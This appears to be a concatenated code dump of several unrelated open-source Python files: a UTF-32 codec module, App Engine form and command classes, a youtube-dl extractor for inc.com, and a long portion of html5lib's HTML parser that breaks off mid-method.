addstate = int((sys.byteorder == "big") !=
(self.decoder is codecs.utf_32_be_decode))
return (state, addstate)
def setstate(self, state):
# state[1] will be ignored by BufferedIncrementalDecoder.setstate()
codecs.BufferedIncrementalDecoder.setstate(self, state)
state = state[1]
if state == 0:
self.decoder = (codecs.utf_32_be_decode
if sys.byteorder == "big"
else codecs.utf_32_le_decode)
elif state == 1:
self.decoder = (codecs.utf_32_le_decode
if sys.byteorder == "big"
else codecs.utf_32_be_decode)
else:
self.decoder = None
class StreamWriter(codecs.StreamWriter):
def __init__(self, stream, errors='strict'):
self.encoder = None
codecs.StreamWriter.__init__(self, stream, errors)
def reset(self):
codecs.StreamWriter.reset(self)
self.encoder = None
def encode(self, input, errors='strict'):
if self.encoder is None:
result = codecs.utf_32_encode(input, errors)
if sys.byteorder == 'little':
self.encoder = codecs.utf_32_le_encode
else:
self.encoder = codecs.utf_32_be_encode
return result
else:
return self.encoder(input, errors)
class StreamReader(codecs.StreamReader):
def reset(self):
codecs.StreamReader.reset(self)
try:
del self.decode
except AttributeError:
pass
def decode(self, input, errors='strict'):
(object, consumed, byteorder) = \
codecs.utf_32_ex_decode(input, errors, 0, False)
if byteorder == -1:
self.decode = codecs.utf_32_le_decode
elif byteorder == 1:
self.decode = codecs.utf_32_be_decode
elif consumed>=4:
raise UnicodeError,"UTF-32 stream does not start with BOM"
return (object, consumed)
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='utf-32',
encode=encode,
decode=decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
|
ghclara/ProgScripts | refs/heads/master | tekton-master/backend/apps/lingAngular_app/commands.py | 1 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from gaebusiness.gaeutil import SaveCommand, ModelSearchCommand
from gaeforms.ndb.form import ModelForm
from gaegraph.business_base import UpdateNode
from lingAngular_app.model import LingAngular
class LingAngularPublicForm(ModelForm):
"""
Form used to show properties on app's home
"""
_model_class = LingAngular
_include = [LingAngular.descricao]
class LingAngularForm(ModelForm):
"""
Form used to save and update operations on app's admin page
"""
_model_class = LingAngular
_include = [LingAngular.descricao]
class LingAngularDetailForm(ModelForm):
"""
Form used to show entity details on app's admin page
"""
_model_class = LingAngular
_include = [LingAngular.creation,
LingAngular.descricao]
class LingAngularShortForm(ModelForm):
"""
Form used to show entity short version on app's admin page, mainly for tables
"""
_model_class = LingAngular
_include = [LingAngular.creation,
LingAngular.descricao]
class SaveLingAngularCommand(SaveCommand):
_model_form_class = LingAngularForm
class UpdateLingAngularCommand(UpdateNode):
_model_form_class = LingAngularForm
class ListLingAngularCommand(ModelSearchCommand):
def __init__(self):
super(ListLingAngularCommand, self).__init__(LingAngular.query_by_creation())
|
vjmac15/Lyilis | refs/heads/master | lib/youtube_dl/extractor/inc (VJ Washington's conflicted copy 2017-08-29).py | 40 | from __future__ import unicode_literals
from .common import InfoExtractor
from .kaltura import KalturaIE
class IncIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?inc\.com/(?:[^/]+/)+(?P<id>[^.]+).html'
_TESTS = [{
'url': 'http://www.inc.com/tip-sheet/bill-gates-says-these-5-books-will-make-you-smarter.html',
'md5': '7416739c9c16438c09fa35619d6ba5cb',
'info_dict': {
'id': '1_wqig47aq',
'ext': 'mov',
'title': 'Bill Gates Says These 5 Books Will Make You Smarter',
'description': 'md5:bea7ff6cce100886fc1995acb743237e',
'timestamp': 1474414430,
'upload_date': '20160920',
'uploader_id': '[email protected]',
},
'params': {
'skip_download': True,
},
}, {
'url': 'http://www.inc.com/video/david-whitford/founders-forum-tripadvisor-steve-kaufer-most-enjoyable-moment-for-entrepreneur.html',
'only_matching': True,
}]
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
partner_id = self._search_regex(
r'var\s+_?bizo_data_partner_id\s*=\s*["\'](\d+)', webpage, 'partner id')
kaltura_id = self._parse_json(self._search_regex(
r'pageInfo\.videos\s*=\s*\[(.+)\];', webpage, 'kaltura id'),
display_id)['vid_kaltura_id']
return self.url_result(
'kaltura:%s:%s' % (partner_id, kaltura_id), KalturaIE.ie_key())
|
gemmaan/moviesenal | refs/heads/master | Hasil/Lib/site-packages/pip/_vendor/html5lib/html5parser.py | 327 | from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import with_metaclass, viewkeys, PY3
import types
try:
from collections import OrderedDict
except ImportError:
from pip._vendor.ordereddict import OrderedDict
from . import _inputstream
from . import _tokenizer
from . import treebuilders
from .treebuilders.base import Marker
from . import _utils
from .constants import (
spaceCharacters, asciiUpper2Lower,
specialElements, headingElements, cdataElements, rcdataElements,
tokenTypes, tagTokenTypes,
namespaces,
htmlIntegrationPointElements, mathmlTextIntegrationPointElements,
adjustForeignAttributes as adjustForeignAttributesMap,
adjustMathMLAttributes, adjustSVGAttributes,
E,
ReparseException
)
def parse(doc, treebuilder="etree", namespaceHTMLElements=True, **kwargs):
"""Parse a string or file-like object into a tree"""
tb = treebuilders.getTreeBuilder(treebuilder)
p = HTMLParser(tb, namespaceHTMLElements=namespaceHTMLElements)
return p.parse(doc, **kwargs)
def parseFragment(doc, container="div", treebuilder="etree", namespaceHTMLElements=True, **kwargs):
tb = treebuilders.getTreeBuilder(treebuilder)
p = HTMLParser(tb, namespaceHTMLElements=namespaceHTMLElements)
return p.parseFragment(doc, container=container, **kwargs)
def method_decorator_metaclass(function):
class Decorated(type):
def __new__(meta, classname, bases, classDict):
for attributeName, attribute in classDict.items():
if isinstance(attribute, types.FunctionType):
attribute = function(attribute)
classDict[attributeName] = attribute
return type.__new__(meta, classname, bases, classDict)
return Decorated
class HTMLParser(object):
"""HTML parser. Generates a tree structure from a stream of (possibly
malformed) HTML"""
def __init__(self, tree=None, strict=False, namespaceHTMLElements=True, debug=False):
"""
strict - raise an exception when a parse error is encountered
tree - a treebuilder class controlling the type of tree that will be
returned. Built in treebuilders can be accessed through
html5lib.treebuilders.getTreeBuilder(treeType)
"""
# Raise an exception on the first error encountered
self.strict = strict
if tree is None:
tree = treebuilders.getTreeBuilder("etree")
self.tree = tree(namespaceHTMLElements)
self.errors = []
self.phases = dict([(name, cls(self, self.tree)) for name, cls in
getPhases(debug).items()])
def _parse(self, stream, innerHTML=False, container="div", scripting=False, **kwargs):
self.innerHTMLMode = innerHTML
self.container = container
self.scripting = scripting
self.tokenizer = _tokenizer.HTMLTokenizer(stream, parser=self, **kwargs)
self.reset()
try:
self.mainLoop()
except ReparseException:
self.reset()
self.mainLoop()
def reset(self):
self.tree.reset()
self.firstStartTag = False
self.errors = []
self.log = [] # only used with debug mode
# "quirks" / "limited quirks" / "no quirks"
self.compatMode = "no quirks"
if self.innerHTMLMode:
self.innerHTML = self.container.lower()
if self.innerHTML in cdataElements:
self.tokenizer.state = self.tokenizer.rcdataState
elif self.innerHTML in rcdataElements:
self.tokenizer.state = self.tokenizer.rawtextState
elif self.innerHTML == 'plaintext':
self.tokenizer.state = self.tokenizer.plaintextState
else:
# state already is data state
# self.tokenizer.state = self.tokenizer.dataState
pass
self.phase = self.phases["beforeHtml"]
self.phase.insertHtmlElement()
self.resetInsertionMode()
else:
self.innerHTML = False # pylint:disable=redefined-variable-type
self.phase = self.phases["initial"]
self.lastPhase = None
self.beforeRCDataPhase = None
self.framesetOK = True
@property
def documentEncoding(self):
"""The name of the character encoding
that was used to decode the input stream,
or :obj:`None` if that is not determined yet.
"""
if not hasattr(self, 'tokenizer'):
return None
return self.tokenizer.stream.charEncoding[0].name
def isHTMLIntegrationPoint(self, element):
if (element.name == "annotation-xml" and
element.namespace == namespaces["mathml"]):
return ("encoding" in element.attributes and
element.attributes["encoding"].translate(
asciiUpper2Lower) in
("text/html", "application/xhtml+xml"))
else:
return (element.namespace, element.name) in htmlIntegrationPointElements
def isMathMLTextIntegrationPoint(self, element):
return (element.namespace, element.name) in mathmlTextIntegrationPointElements
def mainLoop(self):
CharactersToken = tokenTypes["Characters"]
SpaceCharactersToken = tokenTypes["SpaceCharacters"]
StartTagToken = tokenTypes["StartTag"]
EndTagToken = tokenTypes["EndTag"]
CommentToken = tokenTypes["Comment"]
DoctypeToken = tokenTypes["Doctype"]
ParseErrorToken = tokenTypes["ParseError"]
for token in self.normalizedTokens():
prev_token = None
new_token = token
while new_token is not None:
prev_token = new_token
currentNode = self.tree.openElements[-1] if self.tree.openElements else None
currentNodeNamespace = currentNode.namespace if currentNode else None
currentNodeName = currentNode.name if currentNode else None
type = new_token["type"]
if type == ParseErrorToken:
self.parseError(new_token["data"], new_token.get("datavars", {}))
new_token = None
else:
if (len(self.tree.openElements) == 0 or
currentNodeNamespace == self.tree.defaultNamespace or
(self.isMathMLTextIntegrationPoint(currentNode) and
((type == StartTagToken and
token["name"] not in frozenset(["mglyph", "malignmark"])) or
type in (CharactersToken, SpaceCharactersToken))) or
(currentNodeNamespace == namespaces["mathml"] and
currentNodeName == "annotation-xml" and
type == StartTagToken and
token["name"] == "svg") or
(self.isHTMLIntegrationPoint(currentNode) and
type in (StartTagToken, CharactersToken, SpaceCharactersToken))):
phase = self.phase
else:
phase = self.phases["inForeignContent"]
if type == CharactersToken:
new_token = phase.processCharacters(new_token)
elif type == SpaceCharactersToken:
new_token = phase.processSpaceCharacters(new_token)
elif type == StartTagToken:
new_token = phase.processStartTag(new_token)
elif type == EndTagToken:
new_token = phase.processEndTag(new_token)
elif type == CommentToken:
new_token = phase.processComment(new_token)
elif type == DoctypeToken:
new_token = phase.processDoctype(new_token)
if (type == StartTagToken and prev_token["selfClosing"] and
not prev_token["selfClosingAcknowledged"]):
self.parseError("non-void-element-with-trailing-solidus",
{"name": prev_token["name"]})
# When the loop finishes it's EOF
reprocess = True
phases = []
while reprocess:
phases.append(self.phase)
reprocess = self.phase.processEOF()
if reprocess:
assert self.phase not in phases
def normalizedTokens(self):
for token in self.tokenizer:
yield self.normalizeToken(token)
def parse(self, stream, *args, **kwargs):
"""Parse a HTML document into a well-formed tree
stream - a filelike object or string containing the HTML to be parsed
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
scripting - treat noscript elements as if javascript was turned on
"""
self._parse(stream, False, None, *args, **kwargs)
return self.tree.getDocument()
def parseFragment(self, stream, *args, **kwargs):
"""Parse a HTML fragment into a well-formed tree fragment
container - name of the element we're setting the innerHTML property
if set to None, default to 'div'
stream - a filelike object or string containing the HTML to be parsed
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
scripting - treat noscript elements as if javascript was turned on
"""
self._parse(stream, True, *args, **kwargs)
return self.tree.getFragment()
def parseError(self, errorcode="XXX-undefined-error", datavars=None):
# XXX The idea is to make errorcode mandatory.
if datavars is None:
datavars = {}
self.errors.append((self.tokenizer.stream.position(), errorcode, datavars))
if self.strict:
raise ParseError(E[errorcode] % datavars)
def normalizeToken(self, token):
""" HTML5 specific normalizations to the token stream """
if token["type"] == tokenTypes["StartTag"]:
raw = token["data"]
token["data"] = OrderedDict(raw)
if len(raw) > len(token["data"]):
# we had some duplicated attribute, fix so first wins
token["data"].update(raw[::-1])
return token
def adjustMathMLAttributes(self, token):
adjust_attributes(token, adjustMathMLAttributes)
def adjustSVGAttributes(self, token):
adjust_attributes(token, adjustSVGAttributes)
def adjustForeignAttributes(self, token):
adjust_attributes(token, adjustForeignAttributesMap)
def reparseTokenNormal(self, token):
# pylint:disable=unused-argument
self.parser.phase()
def resetInsertionMode(self):
# The name of this method is mostly historical. (It's also used in the
# specification.)
last = False
newModes = {
"select": "inSelect",
"td": "inCell",
"th": "inCell",
"tr": "inRow",
"tbody": "inTableBody",
"thead": "inTableBody",
"tfoot": "inTableBody",
"caption": "inCaption",
"colgroup": "inColumnGroup",
"table": "inTable",
"head": "inBody",
"body": "inBody",
"frameset": "inFrameset",
"html": "beforeHead"
}
for node in self.tree.openElements[::-1]:
nodeName = node.name
new_phase = None
if node == self.tree.openElements[0]:
assert self.innerHTML
last = True
nodeName = self.innerHTML
# Check for conditions that should only happen in the innerHTML
# case
if nodeName in ("select", "colgroup", "head", "html"):
assert self.innerHTML
if not last and node.namespace != self.tree.defaultNamespace:
continue
if nodeName in newModes:
new_phase = self.phases[newModes[nodeName]]
break
elif last:
new_phase = self.phases["inBody"]
break
self.phase = new_phase
def parseRCDataRawtext(self, token, contentType):
"""Generic RCDATA/RAWTEXT Parsing algorithm
contentType - RCDATA or RAWTEXT
"""
assert contentType in ("RAWTEXT", "RCDATA")
self.tree.insertElement(token)
if contentType == "RAWTEXT":
self.tokenizer.state = self.tokenizer.rawtextState
else:
self.tokenizer.state = self.tokenizer.rcdataState
self.originalPhase = self.phase
self.phase = self.phases["text"]
@_utils.memoize
def getPhases(debug):
def log(function):
"""Logger that records which phase processes each token"""
type_names = dict((value, key) for key, value in
tokenTypes.items())
def wrapped(self, *args, **kwargs):
if function.__name__.startswith("process") and len(args) > 0:
token = args[0]
try:
info = {"type": type_names[token['type']]}
except:
raise
if token['type'] in tagTokenTypes:
info["name"] = token['name']
self.parser.log.append((self.parser.tokenizer.state.__name__,
self.parser.phase.__class__.__name__,
self.__class__.__name__,
function.__name__,
info))
return function(self, *args, **kwargs)
else:
return function(self, *args, **kwargs)
return wrapped
def getMetaclass(use_metaclass, metaclass_func):
if use_metaclass:
return method_decorator_metaclass(metaclass_func)
else:
return type
# pylint:disable=unused-argument
class Phase(with_metaclass(getMetaclass(debug, log))):
"""Base class for helper object that implements each phase of processing
"""
def __init__(self, parser, tree):
self.parser = parser
self.tree = tree
def processEOF(self):
raise NotImplementedError
def processComment(self, token):
# For most phases the following is correct. Where it's not it will be
# overridden.
self.tree.insertComment(token, self.tree.openElements[-1])
def processDoctype(self, token):
self.parser.parseError("unexpected-doctype")
def processCharacters(self, token):
self.tree.insertText(token["data"])
def processSpaceCharacters(self, token):
self.tree.insertText(token["data"])
def processStartTag(self, token):
return self.startTagHandler[token["name"]](token)
def startTagHtml(self, token):
if not self.parser.firstStartTag and token["name"] == "html":
self.parser.parseError("non-html-root")
# XXX Need a check here to see if the first start tag token emitted is
# this token... If it's not, invoke self.parser.parseError().
for attr, value in token["data"].items():
if attr not in self.tree.openElements[0].attributes:
self.tree.openElements[0].attributes[attr] = value
self.parser.firstStartTag = False
def processEndTag(self, token):
return self.endTagHandler[token["name"]](token)
class InitialPhase(Phase):
def processSpaceCharacters(self, token):
pass
def processComment(self, token):
self.tree.insertComment(token, self.tree.document)
def processDoctype(self, token):
name = token["name"]
publicId = token["publicId"]
systemId = token["systemId"]
correct = token["correct"]
if (name != "html" or publicId is not None or
systemId is not None and systemId != "about:legacy-compat"):
self.parser.parseError("unknown-doctype")
if publicId is None:
publicId = ""
self.tree.insertDoctype(token)
if publicId != "":
publicId = publicId.translate(asciiUpper2Lower)
if (not correct or token["name"] != "html" or
publicId.startswith(
("+//silmaril//dtd html pro v0r11 19970101//",
"-//advasoft ltd//dtd html 3.0 aswedit + extensions//",
"-//as//dtd html 3.0 aswedit + extensions//",
"-//ietf//dtd html 2.0 level 1//",
"-//ietf//dtd html 2.0 level 2//",
"-//ietf//dtd html 2.0 strict level 1//",
"-//ietf//dtd html 2.0 strict level 2//",
"-//ietf//dtd html 2.0 strict//",
"-//ietf//dtd html 2.0//",
"-//ietf//dtd html 2.1e//",
"-//ietf//dtd html 3.0//",
"-//ietf//dtd html 3.2 final//",
"-//ietf//dtd html 3.2//",
"-//ietf//dtd html 3//",
"-//ietf//dtd html level 0//",
"-//ietf//dtd html level 1//",
"-//ietf//dtd html level 2//",
"-//ietf//dtd html level 3//",
"-//ietf//dtd html strict level 0//",
"-//ietf//dtd html strict level 1//",
"-//ietf//dtd html strict level 2//",
"-//ietf//dtd html strict level 3//",
"-//ietf//dtd html strict//",
"-//ietf//dtd html//",
"-//metrius//dtd metrius presentational//",
"-//microsoft//dtd internet explorer 2.0 html strict//",
"-//microsoft//dtd internet explorer 2.0 html//",
"-//microsoft//dtd internet explorer 2.0 tables//",
"-//microsoft//dtd internet explorer 3.0 html strict//",
"-//microsoft//dtd internet explorer 3.0 html//",
"-//microsoft//dtd internet explorer 3.0 tables//",
"-//netscape comm. corp.//dtd html//",
"-//netscape comm. corp.//dtd strict html//",
"-//o'reilly and associates//dtd html 2.0//",
"-//o'reilly and associates//dtd html extended 1.0//",
"-//o'reilly and associates//dtd html extended relaxed 1.0//",
"-//softquad software//dtd hotmetal pro 6.0::19990601::extensions to html 4.0//",
"-//softquad//dtd hotmetal pro 4.0::19971010::extensions to html 4.0//",
"-//spyglass//dtd html 2.0 extended//",
"-//sq//dtd html 2.0 hotmetal + extensions//",
"-//sun microsystems corp.//dtd hotjava html//",
"-//sun microsystems corp.//dtd hotjava strict html//",
"-//w3c//dtd html 3 1995-03-24//",
"-//w3c//dtd html 3.2 draft//",
"-//w3c//dtd html 3.2 final//",
"-//w3c//dtd html 3.2//",
"-//w3c//dtd html 3.2s draft//",
"-//w3c//dtd html 4.0 frameset//",
"-//w3c//dtd html 4.0 transitional//",
"-//w3c//dtd html experimental 19960712//",
"-//w3c//dtd html experimental 970421//",
"-//w3c//dtd w3 html//",
"-//w3o//dtd w3 html 3.0//",
"-//webtechs//dtd mozilla html 2.0//",
"-//webtechs//dtd mozilla html//")) or
publicId in ("-//w3o//dtd w3 html strict 3.0//en//",
"-/w3c/dtd html 4.0 transitional/en",
"html") or
publicId.startswith(
("-//w3c//dtd html 4.01 frameset//",
"-//w3c//dtd html 4.01 transitional//")) and
systemId is None or
systemId and systemId.lower() == "http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd"):
self.parser.compatMode = "quirks"
elif (publicId.startswith(
("-//w3c//dtd xhtml 1.0 frameset//",
"-//w3c//dtd xhtml 1.0 transitional//")) or
publicId.startswith(
("-//w3c//dtd html 4.01 frameset//",
"-//w3c//dtd html 4.01 transitional//")) and
systemId is not None):
self.parser.compatMode = "limited quirks"
self.parser.phase = self.parser.phases["beforeHtml"]
def anythingElse(self):
self.parser.compatMode = "quirks"
self.parser.phase = self.parser.phases["beforeHtml"]
def processCharacters(self, token):
self.parser.parseError("expected-doctype-but-got-chars")
self.anythingElse()
return token
def processStartTag(self, token):
self.parser.parseError("expected-doctype-but-got-start-tag",
{"name": token["name"]})
self.anythingElse()
return token
def processEndTag(self, token):
self.parser.parseError("expected-doctype-but-got-end-tag",
{"name": token["name"]})
self.anythingElse()
return token
def processEOF(self):
self.parser.parseError("expected-doctype-but-got-eof")
self.anythingElse()
return True
class BeforeHtmlPhase(Phase):
# helper methods
def insertHtmlElement(self):
self.tree.insertRoot(impliedTagToken("html", "StartTag"))
self.parser.phase = self.parser.phases["beforeHead"]
# other
def processEOF(self):
self.insertHtmlElement()
return True
def processComment(self, token):
self.tree.insertComment(token, self.tree.document)
def processSpaceCharacters(self, token):
pass
def processCharacters(self, token):
self.insertHtmlElement()
return token
def processStartTag(self, token):
if token["name"] == "html":
self.parser.firstStartTag = True
self.insertHtmlElement()
return token
def processEndTag(self, token):
if token["name"] not in ("head", "body", "html", "br"):
self.parser.parseError("unexpected-end-tag-before-html",
{"name": token["name"]})
else:
self.insertHtmlElement()
return token
class BeforeHeadPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("head", self.startTagHead)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
(("head", "body", "html", "br"), self.endTagImplyHead)
])
self.endTagHandler.default = self.endTagOther
def processEOF(self):
self.startTagHead(impliedTagToken("head", "StartTag"))
return True
def processSpaceCharacters(self, token):
pass
def processCharacters(self, token):
self.startTagHead(impliedTagToken("head", "StartTag"))
return token
def startTagHtml(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagHead(self, token):
self.tree.insertElement(token)
self.tree.headPointer = self.tree.openElements[-1]
self.parser.phase = self.parser.phases["inHead"]
def startTagOther(self, token):
self.startTagHead(impliedTagToken("head", "StartTag"))
return token
def endTagImplyHead(self, token):
self.startTagHead(impliedTagToken("head", "StartTag"))
return token
def endTagOther(self, token):
self.parser.parseError("end-tag-after-implied-root",
{"name": token["name"]})
class InHeadPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("title", self.startTagTitle),
(("noframes", "style"), self.startTagNoFramesStyle),
("noscript", self.startTagNoscript),
("script", self.startTagScript),
(("base", "basefont", "bgsound", "command", "link"),
self.startTagBaseLinkCommand),
("meta", self.startTagMeta),
("head", self.startTagHead)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("head", self.endTagHead),
(("br", "html", "body"), self.endTagHtmlBodyBr)
])
self.endTagHandler.default = self.endTagOther
# the real thing
def processEOF(self):
self.anythingElse()
return True
def processCharacters(self, token):
self.anythingElse()
return token
def startTagHtml(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagHead(self, token):
self.parser.parseError("two-heads-are-not-better-than-one")
def startTagBaseLinkCommand(self, token):
self.tree.insertElement(token)
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
def startTagMeta(self, token):
self.tree.insertElement(token)
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
attributes = token["data"]
if self.parser.tokenizer.stream.charEncoding[1] == "tentative":
if "charset" in attributes:
self.parser.tokenizer.stream.changeEncoding(attributes["charset"])
elif ("content" in attributes and
"http-equiv" in attributes and
attributes["http-equiv"].lower() == "content-type"):
# Encoding it as UTF-8 here is a hack, as really we should pass
# the abstract Unicode string, and just use the
# ContentAttrParser on that, but using UTF-8 allows all chars
# to be encoded and as a ASCII-superset works.
data = _inputstream.EncodingBytes(attributes["content"].encode("utf-8"))
parser = _inputstream.ContentAttrParser(data)
codec = parser.parse()
self.parser.tokenizer.stream.changeEncoding(codec)
def startTagTitle(self, token):
self.parser.parseRCDataRawtext(token, "RCDATA")
def startTagNoFramesStyle(self, token):
# Need to decide whether to implement the scripting-disabled case
self.parser.parseRCDataRawtext(token, "RAWTEXT")
def startTagNoscript(self, token):
if self.parser.scripting:
self.parser.parseRCDataRawtext(token, "RAWTEXT")
else:
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inHeadNoscript"]
def startTagScript(self, token):
self.tree.insertElement(token)
self.parser.tokenizer.state = self.parser.tokenizer.scriptDataState
self.parser.originalPhase = self.parser.phase
self.parser.phase = self.parser.phases["text"]
def startTagOther(self, token):
self.anythingElse()
return token
def endTagHead(self, token):
node = self.parser.tree.openElements.pop()
assert node.name == "head", "Expected head got %s" % node.name
self.parser.phase = self.parser.phases["afterHead"]
def endTagHtmlBodyBr(self, token):
self.anythingElse()
return token
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
def anythingElse(self):
self.endTagHead(impliedTagToken("head"))
class InHeadNoscriptPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
(("basefont", "bgsound", "link", "meta", "noframes", "style"), self.startTagBaseLinkCommand),
(("head", "noscript"), self.startTagHeadNoscript),
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("noscript", self.endTagNoscript),
("br", self.endTagBr),
])
self.endTagHandler.default = self.endTagOther
def processEOF(self):
self.parser.parseError("eof-in-head-noscript")
self.anythingElse()
return True
def processComment(self, token):
return self.parser.phases["inHead"].processComment(token)
def processCharacters(self, token):
self.parser.parseError("char-in-head-noscript")
self.anythingElse()
return token
def processSpaceCharacters(self, token):
return self.parser.phases["inHead"].processSpaceCharacters(token)
def startTagHtml(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagBaseLinkCommand(self, token):
return self.parser.phases["inHead"].processStartTag(token)
def startTagHeadNoscript(self, token):
self.parser.parseError("unexpected-start-tag", {"name": token["name"]})
def startTagOther(self, token):
self.parser.parseError("unexpected-inhead-noscript-tag", {"name": token["name"]})
self.anythingElse()
return token
def endTagNoscript(self, token):
node = self.parser.tree.openElements.pop()
assert node.name == "noscript", "Expected noscript got %s" % node.name
self.parser.phase = self.parser.phases["inHead"]
def endTagBr(self, token):
self.parser.parseError("unexpected-inhead-noscript-tag", {"name": token["name"]})
self.anythingElse()
return token
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
def anythingElse(self):
# Caller must raise parse error first!
self.endTagNoscript(impliedTagToken("noscript"))
class AfterHeadPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("body", self.startTagBody),
("frameset", self.startTagFrameset),
(("base", "basefont", "bgsound", "link", "meta", "noframes", "script",
"style", "title"),
self.startTagFromHead),
("head", self.startTagHead)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([(("body", "html", "br"),
self.endTagHtmlBodyBr)])
self.endTagHandler.default = self.endTagOther
def processEOF(self):
self.anythingElse()
return True
def processCharacters(self, token):
self.anythingElse()
return token
def startTagHtml(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagBody(self, token):
self.parser.framesetOK = False
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inBody"]
def startTagFrameset(self, token):
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inFrameset"]
def startTagFromHead(self, token):
self.parser.parseError("unexpected-start-tag-out-of-my-head",
{"name": token["name"]})
self.tree.openElements.append(self.tree.headPointer)
self.parser.phases["inHead"].processStartTag(token)
for node in self.tree.openElements[::-1]:
if node.name == "head":
self.tree.openElements.remove(node)
break
def startTagHead(self, token):
self.parser.parseError("unexpected-start-tag", {"name": token["name"]})
def startTagOther(self, token):
self.anythingElse()
return token
def endTagHtmlBodyBr(self, token):
self.anythingElse()
return token
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
def anythingElse(self):
self.tree.insertElement(impliedTagToken("body", "StartTag"))
self.parser.phase = self.parser.phases["inBody"]
self.parser.framesetOK = True
class InBodyPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#parsing-main-inbody
# the really-really-really-very crazy mode
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
# Set this to the default handler
self.processSpaceCharacters = self.processSpaceCharactersNonPre
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
(("base", "basefont", "bgsound", "command", "link", "meta",
"script", "style", "title"),
self.startTagProcessInHead),
("body", self.startTagBody),
("frameset", self.startTagFrameset),
(("address", "article", "aside", "blockquote", "center", "details",
"dir", "div", "dl", "fieldset", "figcaption", "figure",
"footer", "header", "hgroup", "main", "menu", "nav", "ol", "p",
"section", "summary", "ul"),
self.startTagCloseP),
(headingElements, self.startTagHeading),
(("pre", "listing"), self.startTagPreListing),
("form", self.startTagForm),
(("li", "dd", "dt"), self.startTagListItem),
("plaintext", self.startTagPlaintext),
("a", self.startTagA),
(("b", "big", "code", "em", "font", "i", "s", "small", "strike",
"strong", "tt", "u"), self.startTagFormatting),
("nobr", self.startTagNobr),
("button", self.startTagButton),
(("applet", "marquee", "object"), self.startTagAppletMarqueeObject),
("xmp", self.startTagXmp),
("table", self.startTagTable),
(("area", "br", "embed", "img", "keygen", "wbr"),
self.startTagVoidFormatting),
(("param", "source", "track"), self.startTagParamSource),
("input", self.startTagInput),
("hr", self.startTagHr),
("image", self.startTagImage),
("isindex", self.startTagIsIndex),
("textarea", self.startTagTextarea),
("iframe", self.startTagIFrame),
("noscript", self.startTagNoscript),
(("noembed", "noframes"), self.startTagRawtext),
("select", self.startTagSelect),
(("rp", "rt"), self.startTagRpRt),
(("option", "optgroup"), self.startTagOpt),
(("math"), self.startTagMath),
(("svg"), self.startTagSvg),
(("caption", "col", "colgroup", "frame", "head",
"tbody", "td", "tfoot", "th", "thead",
"tr"), self.startTagMisplaced)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("body", self.endTagBody),
("html", self.endTagHtml),
(("address", "article", "aside", "blockquote", "button", "center",
"details", "dialog", "dir", "div", "dl", "fieldset", "figcaption", "figure",
"footer", "header", "hgroup", "listing", "main", "menu", "nav", "ol", "pre",
"section", "summary", "ul"), self.endTagBlock),
("form", self.endTagForm),
("p", self.endTagP),
(("dd", "dt", "li"), self.endTagListItem),
(headingElements, self.endTagHeading),
(("a", "b", "big", "code", "em", "font", "i", "nobr", "s", "small",
"strike", "strong", "tt", "u"), self.endTagFormatting),
(("applet", "marquee", "object"), self.endTagAppletMarqueeObject),
("br", self.endTagBr),
])
self.endTagHandler.default = self.endTagOther
def isMatchingFormattingElement(self, node1, node2):
return (node1.name == node2.name and
node1.namespace == node2.namespace and
node1.attributes == node2.attributes)
# helper
def addFormattingElement(self, token):
self.tree.insertElement(token)
element = self.tree.openElements[-1]
matchingElements = []
for node in self.tree.activeFormattingElements[::-1]:
if node is Marker:
break
elif self.isMatchingFormattingElement(node, element):
matchingElements.append(node)
assert len(matchingElements) <= 3
if len(matchingElements) == 3:
self.tree.activeFormattingElements.remove(matchingElements[-1])
self.tree.activeFormattingElements.append(element)
# the real deal
def processEOF(self):
allowed_elements = frozenset(("dd", "dt", "li", "p", "tbody", "td",
"tfoot", "th", "thead", "tr", "body",
"html"))
for node in self.tree.openElements[::-1]:
if node.name not in allowed_elements:
self.parser.parseError("expected-closing-tag-but-got-eof")
break
# Stop parsing
def processSpaceCharactersDropNewline(self, token):
# Sometimes (start of <pre>, <listing>, and <textarea> blocks) we
